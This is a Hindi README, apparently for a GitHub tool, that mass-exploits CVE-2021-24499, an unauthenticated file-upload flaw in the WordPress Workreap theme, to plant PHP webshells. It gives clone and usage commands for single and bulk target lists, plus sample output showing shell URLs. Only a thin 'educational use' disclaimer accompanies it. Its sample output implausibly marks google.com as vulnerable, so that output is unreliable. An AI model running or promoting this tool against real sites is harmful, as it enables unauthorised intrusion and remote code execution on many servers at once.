
WordPress थीम Workreap 2.2.2 - बिना प्रमाणीकरण के अपलोड जो रिमोट कोड निष्पादन की ओर ले जाता है
WordPress थीम Workreap 2.2.2 - बिना प्रमाणीकरण के फ़ाइल अपलोड जो रिमोट कोड निष्पादन की ओर ले जाता है
CVE-2021-24499 कमजोरी के लिए WordPress Workreap थीम में एक शक्तिशाली और सटीक बड़े पैमाने पर शोषण उपकरण। यह शोषण बिना प्रमाणीकरण के फ़ाइल अपलोड की अनुमति देता है जो रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।
CVE-2021-24499 WordPress Workreap थीम (संस्करण 2.2.2 और उससे नीचे) में एक गंभीर कमजोरी है जो बिना प्रमाणीकरण के उपयोगकर्ताओं को workreap_award_temp_file_uploader AJAX कार्रवाई के माध्यम से मनमानी फ़ाइलें, जिनमें PHP फ़ाइलें शामिल हैं, अपलोड करने की अनुमति देती है। यह लक्ष्य सर्वर पर रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।
कमजोर संस्करण: सभी संस्करण 2.2.2 तक और इसमें शामिल
CVSS स्कोर: गंभीर
curl कमांड-लाइन टूलopts.php या shell.php फ़ाइल (PHP वेबशेल)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php या shell.php (आपका PHP वेबशेल) हैएकल लक्ष्य:
./exploit.sh -u http://target.com
एकाधिक लक्ष्य (फ़ाइल से):
./exploit.sh -l targets.txt
सहायता दिखाएं:
./exploit.sh --help
| विकल्प | विवरण |
|---|---|
-u URL | एकल लक्ष्य URL का शोषण करें |
-l FILE | फ़ाइल से एकाधिक लक्ष्यों का शोषण करें (प्रति पंक्ति एक URL) |
--help | सहायता मेनू दिखाएं |
प्रति पंक्ति एक URL के साथ एक टेक्स्ट फ़ाइल बनाएं:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस उपकरण का उपयोग करके, आप इसे केवल वैध सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए उपयोग करने के लिए सहमत हैं।
लेखक: Jay Maranatha Hutajulu
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
योगदान, मुद्दे और सुविधा अनुरोधों का स्वागत है! बेझिझक मुद्दों के पृष्ठ की जाँच करें।
यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे एक स्टार ⭐ देने पर विचार करें।
याद रखें: हमेशा सुरक्षा उपकरणों का जिम्मेदारी और नैतिकता से उपयोग करें। हैप्पी हैकिंग! 🚀